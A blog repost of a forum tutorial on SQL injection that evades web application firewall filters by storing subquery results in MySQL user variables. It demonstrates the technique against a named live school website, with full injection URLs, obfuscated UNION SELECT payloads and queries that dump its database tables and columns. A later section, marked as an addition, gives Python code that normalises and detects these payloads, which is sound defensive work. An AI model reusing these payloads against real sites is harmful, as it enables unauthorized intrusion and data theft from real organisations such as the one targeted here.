
// Posted by: Unknown // On: Monday, 13 February 2017

hello friends,

today we will discuss how to bypass hard WAF filters with a local variable. When the regular formats for dumping data are not working, this is the best alternative to try to bypass hard filters, though it won't work every time.

ok, let's start.

I'll explain it on a live site,

site>>  http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=8

and I got the vulnerable columns

http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,3,4--+

and let's dump tables and columns


http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),4--+

result >>   403 forbidden

we have tried all the ways to bypass the WAF but it didn't work, so now let's try with a local variable.


A local variable is simply a value holder: it will hold a certain value and give output when the command is executed, so let's see it practically.


see the query below: I opened a variable with the name "sqli" and stored a value there, and I placed that variable in the vulnerable column, which will show output when the query is executed.

http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=.8' and @sqli:=(seLeCt concat/**/(version())) /*!50000UNION*/+SELECT+1,2,@sqli,4--+

output

[Image: vxu1l.png]

likewise, now let's dump data [tables and columns]



http://www.kantipurinternational.edu.np/....php?id=.8' and @sqli:=(select /*!50000GrOUp_ConCat(0x3c6c693e,/*!50000table_naMe*/,0x20203a3a2020,/*!50000ColuMN_naMe*/) FrOm /*!50000information_schema.columns*/ where table_schema=database/**_**/()) /*!50000UNION*/+SELECT+1,2,@sqli,4--+





and the output:

[Image: 2q8964g.png]
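As an added example, not from the original post: a small Python normaliser (my own code, with assumed names) that undoes the three tricks the payloads above rely on, URL encoding, MySQL version comments such as /*!50000UNION*/, and hex string literals like 0x3c6c693e, and shows that a keyword filter run on the raw request misses them while the same rules applied after normalisation flag the user-variable assignment and the UNION SELECT. The sample requests are constructed with a placeholder path.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample requests with the payload shapes used in the post (placeholder path, not a real host).
SAMPLE_REQUESTS = [
    "/pages/facilities_details.php?id=8",
    "/pages/facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,3,4--+",
    "/pages/facilities_details.php?id=.8' and @sqli:=(seLeCt concat/**/(version()))"
    " /*!50000UNION*/+SELECT+1,2,@sqli,4--+",
]

def naive_blocked(raw):
    """A keyword match on the raw request: the kind of filter the post's payloads slip past."""
    low = raw.lower()
    return "union select" in low or "information_schema" in low

def decode_hex_literals(s):
    """Show 0x.. literals (used instead of quoted strings) as text when they decode to printable ASCII."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        text = bytes.fromhex(digits).decode("ascii", "replace")
        return repr(text) if text.isprintable() else m.group(0)
    return re.sub(r"\b0x([0-9a-f]+)\b", repl, s)

def normalize(raw):
    """Reduce the request to roughly what MySQL will actually execute."""
    s = unquote_plus(raw)                                    # '+' and %xx back to characters
    s = re.sub(r"/\*!\d{5}(.*?)\*/", r"\1", s, flags=re.S)  # /*!50000X*/ executes as X on MySQL
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)            # remaining comments such as /**/ are just gaps
    s = re.sub(r"\s+", " ", s).strip().lower()
    return decode_hex_literals(s)

RULES = {
    "user_var_assign": re.compile(r"@\w+\s*:="),            # @sqli:=(...) smuggling a subquery result
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    "comment_terminator": re.compile(r"--\s*$"),
}

def classify(raw):
    """Rule names that fire once the request is normalised (sorted for stable output)."""
    s = normalize(raw)
    return sorted(name for name, rx in RULES.items() if rx.search(s))

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(naive_blocked(req), classify(req), normalize(req), sep=" | ")
```

Matching after normalisation is the point: the raw-string filter returns False for every payload, while classify() reports the assignment and the union on the same input.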


hope you are clear with this and that's all for this tutorial :)

my next tutorial will be on bypassing hard WAF filters with cookie-based injection.

please give your feedback about my tutorial

thank you

cya! :)

source http://forum.sqliwiki.com/showthread.php?tid=4164


// Copyright © 2012 Catatan seorang newbie //Anime-Note//Powered by Blogger // Designed by Johanes Djogan //